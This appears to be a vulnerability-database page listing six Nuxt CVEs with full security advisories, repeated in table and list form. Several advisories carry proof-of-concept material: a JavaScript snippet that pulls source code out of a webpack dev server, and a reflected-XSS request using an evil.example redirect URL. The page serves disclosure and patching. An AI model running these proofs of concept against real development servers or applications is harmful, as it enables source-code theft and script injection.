Nuxt
by Nuxt
Source repositories
CVEs (6)
| CVE | Vendor / Product | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2025-24361 | Med | 0.27 | 5.3 | 0.00 | Jan 25, 2025 | Nuxt is an open-source web development framework for Vue.js. Source code may be stolen during dev when using version 3.0.0 through 3.15.12 of the webpack builder or version 3.12.2 through 3.152 of the rspack builder and a victim opens a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. Version 3.15.13 of Nuxt patches this issue. | ||
| CVE-2025-24360 | Med | 0.27 | 5.3 | 0.00 | Jan 25, 2025 | Nuxt is an open-source web development framework for Vue.js. Starting in version 3.8.1 and prior to version 3.15.3, Nuxt allows any websites to send any requests to the development server and read the response due to default CORS settings. Users with the default server.cors option using Vite builder may get the source code stolen by malicious websites. Version 3.15.3 fixes the vulnerability. | ||
| CVE-2026-46342 | low | 0.00 | — | — | May 19, 2026 | ### Summary The `/__nuxt_island/*` endpoint accepts attacker-controlled `props` query/body parameters and renders any island component without verifying that the URL-resident hash (`_.json`) was actually issued for those inputs by ``. The hash is computed and embedded client-side but never validated server-side, so the same path can return materially different responses depending on the query. Island components are documented as rendering independently of route context - page middleware does not apply to them, and they are intentionally cacheable as a function of their props. This advisory does **not** treat that contract as a vulnerability. It treats the absence of a binding between the URL the cache keys on and the response served at that URL as one. ### Impact In applications where a CDN or reverse-proxy in front of the app caches `/__nuxt_island/*` keyed by path only (ignoring query) - a documented misconfiguration class, see GHSA-jvhm-gjrh-3h93 - an attacker can prime the cache for a path with their own choice of props, and subsequent users requesting the same path receive the attacker's rendered HTML rather than the response intended for them. The cache entry persists until normal expiry. Where the affected island has any prop flowing into an unsafe HTML sink in application code (`v-html`, `innerHTML`, a third-party renderer treating a prop as HTML), this becomes stored XSS in the embedding page's origin until the cache entry expires. `HttpOnly` cookies remain out of reach but anything else in the origin (other cookies, in-origin requests, DOM state) is reachable by the injected script. Preconditions: - `experimental.componentIslands` enabled (or the default `'auto'` with at least one server / island component in the app). - A shared intermediary cache (CDN, reverse-proxy, edge cache) keyed on path only. - For the XSS pivot specifically: an application-authored island that puts a prop through an unsafe HTML sink. Without the second precondition, the response shape is per-request and unaffected. Without the third, the worst case is content-swap / inert HTML injection rather than script execution. ### Patches Patched in `nuxt@4.4.6` and `nuxt@3.21.6` by [#35077](https://github.com/nuxt/nuxt/pull/35077). The island handler now recomputes the expected `hashId` from `(name, props, context)` using the same `ohash` function `` already uses to embed the hash in the URL, and rejects requests (HTTP 400) whose URL-resident hash does not match. The response is now a pure function of the request path: a path-keyed shared cache returns the correct response to every requester for that path, and an attacker cannot synthesise a path whose hash matches arbitrary props. ### Workarounds For users unable to upgrade immediately: - Ensure any intermediary cache keys `/__nuxt_island/*` on the full query string, not on the path alone. This is the recommended configuration regardless. - Audit application-authored islands for props flowing into `v-html` / `innerHTML` / similar HTML sinks; treat island props as untrusted user input. ### Note on island authentication > [!IMPORTANT] > It's important to remember that route middleware does not run when rendering island components, and islands cannot rely on routing-layer auth. Applications gating sensitive data behind page middleware should enforce that auth inside the island's own data layer (server-only routes, `useRequestEvent` + manual session checks, etc.) rather than relying on the embedding page's middleware - this was true before this advisory and remains true after it. A separate advisory addresses `*.server.vue` *pages* registered as `page_` islands, where the documented "middleware doesn't run for islands" contract collides with the page's own `definePageMeta({ middleware })` declaration in a way that constitutes a genuine bug rather than documented behaviour. | ||
| CVE-2026-45670 | 0.00 | — | — | May 19, 2026 | ### Summary This is an incomplete fix for [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99). Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. `nuxt dev --host`) and the developer opens a malicious site on the same network. ### Details The fix for [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99) relied on Sec-Fetch-Mode and Sec-Fetch-Site headers. Because [these headers are sent by the browsers only for potentially trustworthy origins](https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header:~:text=Site%20header%20for%20a%20request%20r%3A-,Assert%3A%20r%E2%80%99s%20url%20is%20a%20potentially%20trustworthy%20URL.,-Let%20header%20be%20a%20Structured%20Field%20whose), the check is able to bypass for non-potentially trustworthy origins. Since the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using `--host` is affected. ### PoC 1. Create a nuxt project with webpack / rspack builder. 1. Run `npm run dev` 1. Open `http://localhost:3000` 1. Run the script below in a web site that has a different origin. 1. You can see the source code output in the document and the devtools console. ```js const script = document.createElement('script') script.src = 'http://192.168.0.31:3000/_nuxt/app.js' // NOTE: replace with the IP address the dev server listens to script.addEventListener('load', () => { const key = Object.keys(window).find(k => k.startsWith("webpackChunk")) for (const page in window[key]) { const moduleList = window[key][page][1] console.log(moduleList) for (const key in moduleList) { const p = document.createElement('p') const title = document.createElement('strong') title.textContent = key const code = document.createElement('code') code.textContent = moduleList[key].toString() p.append(title, ':', document.createElement('br'), code) document.body.appendChild(p) } } }) document.head.appendChild(script) ``` (This script is the similar with [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99) except for the `script.src` and the global variable name) ### Impact Users using webpack / rspack builder may get the source code stolen by malicious websites if it uses a predictable host and also is using `--host`. This vulnerability does not affect Chrome 142+ (and other Chromium based browsers) users due to [the local network access restriction feature](https://developer.chrome.com/release-notes/142#local_network_access_restrictions). ### Patches Fixed in `nuxt@4.4.6` and `nuxt@3.21.6` by [#35051](https://github.com/nuxt/nuxt/pull/35051). The dev-middleware same-origin check now falls back to comparing the request's `Origin` / `Referer` host against `Host` when `Sec-Fetch-*` headers are absent, closing the non-trustworthy-origin bypass. The fix only ships for the `@nuxt/webpack-builder` and `@nuxt/rspack-builder` packages. The default Vite builder was not affected. ### Workarounds If you cannot upgrade immediately: - Don't use `nuxt dev --host`. Bind the dev server to `localhost` (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks. - Use Chrome 142+ or another Chromium-based browser that enforces [local network access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions). - Switch to the Vite builder for development. | |||
| CVE-2026-45669 | 0.00 | — | — | May 19, 2026 | ### Summary `navigateTo()` with `external: true` generates a server-side HTML redirect body containing a `` tag. The destination URL is only sanitized by replacing `"` with `%22`, leaving `<`, `>`, `&`, and `'` unencoded. An attacker who can influence the URL passed to `navigateTo(url, { external: true })` can break out of the `content="…"` attribute and inject arbitrary HTML/JavaScript that executes under the application's origin. This is a different root cause from CVE-2024-34343 (GHSA-vf6r-87q4-2vjf), which addressed `javascript:` protocol bypass. The issue here is triggered by any valid URL containing `>`. ### Impact Applications that pass user-controlled input to `navigateTo(url, { external: true })` — typically via a `?next=` / `?redirect=` query parameter used for post-login or "return to" flows — are vulnerable to reflected cross-site scripting. The injected script runs in the context of the application's origin during the server-rendered redirect response, before the meta-refresh fires. ### Details In `packages/nuxt/src/app/composables/router.ts`, the SSR redirect path builds an HTML response body with only `"` percent-encoded in the destination URL: ```ts const encodedLoc = location.replace(/"/g, '%22') nuxtApp.ssrContext!['~renderResponse'] = { status: sanitizeStatusCode(options?.redirectCode || 302, 302), body: `<!DOCTYPE html>`, headers: { location: encodeURL(location, isExternalHost) }, } ``` The `Location` header is normalised through `encodeURL()` (which uses the `URL` constructor and correctly percent-encodes attribute-significant characters). The HTML body uses a narrower sanitiser. That mismatch is the root cause. ### Proof of concept Global middleware that forwards a query parameter to `navigateTo`: ```ts // middleware/redirect.global.ts export default defineNuxtRouteMiddleware((to) => { const next = to.query.next as string | undefined if (next) { return navigateTo(next, { external: true }) } }) ``` Request: ``` GET /?next=https://evil.example/x> ``` Response body: ```html <!DOCTYPE html>"> ``` The `>` after `evil.example/x` terminates the `content="…"` attribute, and the `` tag executes JavaScript in the application's origin before any redirect occurs. ### Patches Fixed in `nuxt@4.4.6` and `nuxt@3.21.6` by [#35052](https://github.com/nuxt/nuxt/pull/35052). The fix percent-encodes the full set of HTML-attribute-significant characters (`&`, `"`, `'`, `<`, `>`) before interpolating the URL into the meta-refresh body ### Workarounds If you can't upgrade immediately, validate user-controlled URLs before passing them to `navigateTo(url, { external: true })`. At minimum, normalise through `new URL(input).toString()` and reject inputs containing `<` or `>` (a normalised URL with these characters is malformed and safe to refuse). | |||
| CVE-2025-59414 | 0.00 | — | 0.00 | Sep 17, 2025 | Nuxt is an open-source web development framework for Vue.js. Prior to 3.19.0 and 4.1.0, A client-side path traversal vulnerability in Nuxt's Island payload revival mechanism allowed attackers to manipulate client-side requests to different endpoints within the same application domain when specific prerendering conditions are met. The vulnerability occurs in the client-side payload revival process (revive-payload.client.ts) where Nuxt Islands are automatically fetched when encountering serialized __nuxt_island objects. During prerendering, if an API endpoint returns user-controlled data containing a crafted __nuxt_island object, he data gets serialized with devalue.stringify and stored in the prerendered page. When a client navigates to the prerendered page, devalue.parse deserializes the payload. The Island reviver attempts to fetch /__nuxt_island/${key}.json where key could contain path traversal sequences. Update to Nuxt 3.19.0+ or 4.1.0+. |
- risk 0.27cvss 5.3epss 0.00
Nuxt is an open-source web development framework for Vue.js. Source code may be stolen during dev when using version 3.0.0 through 3.15.12 of the webpack builder or version 3.12.2 through 3.152 of the rspack builder and a victim opens a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. Version 3.15.13 of Nuxt patches this issue.
- risk 0.27cvss 5.3epss 0.00
Nuxt is an open-source web development framework for Vue.js. Starting in version 3.8.1 and prior to version 3.15.3, Nuxt allows any websites to send any requests to the development server and read the response due to default CORS settings. Users with the default server.cors option using Vite builder may get the source code stolen by malicious websites. Version 3.15.3 fixes the vulnerability.
- risk 0.00cvss —epss —
### Summary The `/__nuxt_island/*` endpoint accepts attacker-controlled `props` query/body parameters and renders any island component without verifying that the URL-resident hash (`_.json`) was actually issued for those inputs by ``. The hash is computed and embedded client-side but never validated server-side, so the same path can return materially different responses depending on the query. Island components are documented as rendering independently of route context - page middleware does not apply to them, and they are intentionally cacheable as a function of their props. This advisory does **not** treat that contract as a vulnerability. It treats the absence of a binding between the URL the cache keys on and the response served at that URL as one. ### Impact In applications where a CDN or reverse-proxy in front of the app caches `/__nuxt_island/*` keyed by path only (ignoring query) - a documented misconfiguration class, see GHSA-jvhm-gjrh-3h93 - an attacker can prime the cache for a path with their own choice of props, and subsequent users requesting the same path receive the attacker's rendered HTML rather than the response intended for them. The cache entry persists until normal expiry. Where the affected island has any prop flowing into an unsafe HTML sink in application code (`v-html`, `innerHTML`, a third-party renderer treating a prop as HTML), this becomes stored XSS in the embedding page's origin until the cache entry expires. `HttpOnly` cookies remain out of reach but anything else in the origin (other cookies, in-origin requests, DOM state) is reachable by the injected script. Preconditions: - `experimental.componentIslands` enabled (or the default `'auto'` with at least one server / island component in the app). - A shared intermediary cache (CDN, reverse-proxy, edge cache) keyed on path only. - For the XSS pivot specifically: an application-authored island that puts a prop through an unsafe HTML sink. Without the second precondition, the response shape is per-request and unaffected. Without the third, the worst case is content-swap / inert HTML injection rather than script execution. ### Patches Patched in `nuxt@4.4.6` and `nuxt@3.21.6` by [#35077](https://github.com/nuxt/nuxt/pull/35077). The island handler now recomputes the expected `hashId` from `(name, props, context)` using the same `ohash` function `` already uses to embed the hash in the URL, and rejects requests (HTTP 400) whose URL-resident hash does not match. The response is now a pure function of the request path: a path-keyed shared cache returns the correct response to every requester for that path, and an attacker cannot synthesise a path whose hash matches arbitrary props. ### Workarounds For users unable to upgrade immediately: - Ensure any intermediary cache keys `/__nuxt_island/*` on the full query string, not on the path alone. This is the recommended configuration regardless. - Audit application-authored islands for props flowing into `v-html` / `innerHTML` / similar HTML sinks; treat island props as untrusted user input. ### Note on island authentication > [!IMPORTANT] > It's important to remember that route middleware does not run when rendering island components, and islands cannot rely on routing-layer auth. Applications gating sensitive data behind page middleware should enforce that auth inside the island's own data layer (server-only routes, `useRequestEvent` + manual session checks, etc.) rather than relying on the embedding page's middleware - this was true before this advisory and remains true after it. A separate advisory addresses `*.server.vue` *pages* registered as `page_` islands, where the documented "middleware doesn't run for islands" contract collides with the page's own `definePageMeta({ middleware })` declaration in a way that constitutes a genuine bug rather than documented behaviour.
- CVE-2026-45670May 19, 2026risk 0.00cvss —epss —
### Summary This is an incomplete fix for [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99). Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. `nuxt dev --host`) and the developer opens a malicious site on the same network. ### Details The fix for [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99) relied on Sec-Fetch-Mode and Sec-Fetch-Site headers. Because [these headers are sent by the browsers only for potentially trustworthy origins](https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header:~:text=Site%20header%20for%20a%20request%20r%3A-,Assert%3A%20r%E2%80%99s%20url%20is%20a%20potentially%20trustworthy%20URL.,-Let%20header%20be%20a%20Structured%20Field%20whose), the check is able to bypass for non-potentially trustworthy origins. Since the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using `--host` is affected. ### PoC 1. Create a nuxt project with webpack / rspack builder. 1. Run `npm run dev` 1. Open `http://localhost:3000` 1. Run the script below in a web site that has a different origin. 1. You can see the source code output in the document and the devtools console. ```js const script = document.createElement('script') script.src = 'http://192.168.0.31:3000/_nuxt/app.js' // NOTE: replace with the IP address the dev server listens to script.addEventListener('load', () => { const key = Object.keys(window).find(k => k.startsWith("webpackChunk")) for (const page in window[key]) { const moduleList = window[key][page][1] console.log(moduleList) for (const key in moduleList) { const p = document.createElement('p') const title = document.createElement('strong') title.textContent = key const code = document.createElement('code') code.textContent = moduleList[key].toString() p.append(title, ':', document.createElement('br'), code) document.body.appendChild(p) } } }) document.head.appendChild(script) ``` (This script is the similar with [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99) except for the `script.src` and the global variable name) ### Impact Users using webpack / rspack builder may get the source code stolen by malicious websites if it uses a predictable host and also is using `--host`. This vulnerability does not affect Chrome 142+ (and other Chromium based browsers) users due to [the local network access restriction feature](https://developer.chrome.com/release-notes/142#local_network_access_restrictions). ### Patches Fixed in `nuxt@4.4.6` and `nuxt@3.21.6` by [#35051](https://github.com/nuxt/nuxt/pull/35051). The dev-middleware same-origin check now falls back to comparing the request's `Origin` / `Referer` host against `Host` when `Sec-Fetch-*` headers are absent, closing the non-trustworthy-origin bypass. The fix only ships for the `@nuxt/webpack-builder` and `@nuxt/rspack-builder` packages. The default Vite builder was not affected. ### Workarounds If you cannot upgrade immediately: - Don't use `nuxt dev --host`. Bind the dev server to `localhost` (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks. - Use Chrome 142+ or another Chromium-based browser that enforces [local network access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions). - Switch to the Vite builder for development.
- CVE-2026-45669May 19, 2026risk 0.00cvss —epss —
### Summary `navigateTo()` with `external: true` generates a server-side HTML redirect body containing a `` tag. The destination URL is only sanitized by replacing `"` with `%22`, leaving `<`, `>`, `&`, and `'` unencoded. An attacker who can influence the URL passed to `navigateTo(url, { external: true })` can break out of the `content="…"` attribute and inject arbitrary HTML/JavaScript that executes under the application's origin. This is a different root cause from CVE-2024-34343 (GHSA-vf6r-87q4-2vjf), which addressed `javascript:` protocol bypass. The issue here is triggered by any valid URL containing `>`. ### Impact Applications that pass user-controlled input to `navigateTo(url, { external: true })` — typically via a `?next=` / `?redirect=` query parameter used for post-login or "return to" flows — are vulnerable to reflected cross-site scripting. The injected script runs in the context of the application's origin during the server-rendered redirect response, before the meta-refresh fires. ### Details In `packages/nuxt/src/app/composables/router.ts`, the SSR redirect path builds an HTML response body with only `"` percent-encoded in the destination URL: ```ts const encodedLoc = location.replace(/"/g, '%22') nuxtApp.ssrContext!['~renderResponse'] = { status: sanitizeStatusCode(options?.redirectCode || 302, 302), body: `<!DOCTYPE html>`, headers: { location: encodeURL(location, isExternalHost) }, } ``` The `Location` header is normalised through `encodeURL()` (which uses the `URL` constructor and correctly percent-encodes attribute-significant characters). The HTML body uses a narrower sanitiser. That mismatch is the root cause. ### Proof of concept Global middleware that forwards a query parameter to `navigateTo`: ```ts // middleware/redirect.global.ts export default defineNuxtRouteMiddleware((to) => { const next = to.query.next as string | undefined if (next) { return navigateTo(next, { external: true }) } }) ``` Request: ``` GET /?next=https://evil.example/x> ``` Response body: ```html <!DOCTYPE html>"> ``` The `>` after `evil.example/x` terminates the `content="…"` attribute, and the `` tag executes JavaScript in the application's origin before any redirect occurs. ### Patches Fixed in `nuxt@4.4.6` and `nuxt@3.21.6` by [#35052](https://github.com/nuxt/nuxt/pull/35052). The fix percent-encodes the full set of HTML-attribute-significant characters (`&`, `"`, `'`, `<`, `>`) before interpolating the URL into the meta-refresh body ### Workarounds If you can't upgrade immediately, validate user-controlled URLs before passing them to `navigateTo(url, { external: true })`. At minimum, normalise through `new URL(input).toString()` and reject inputs containing `<` or `>` (a normalised URL with these characters is malformed and safe to refuse).
- CVE-2025-59414Sep 17, 2025risk 0.00cvss —epss 0.00
Nuxt is an open-source web development framework for Vue.js. Prior to 3.19.0 and 4.1.0, A client-side path traversal vulnerability in Nuxt's Island payload revival mechanism allowed attackers to manipulate client-side requests to different endpoints within the same application domain when specific prerendering conditions are met. The vulnerability occurs in the client-side payload revival process (revive-payload.client.ts) where Nuxt Islands are automatically fetched when encountering serialized __nuxt_island objects. During prerendering, if an API endpoint returns user-controlled data containing a crafted __nuxt_island object, he data gets serialized with devalue.stringify and stored in the prerendered page. When a client navigates to the prerendered page, devalue.parse deserializes the payload. The Island reviver attempts to fetch /__nuxt_island/${key}.json where key could contain path traversal sequences. Update to Nuxt 3.19.0+ or 4.1.0+.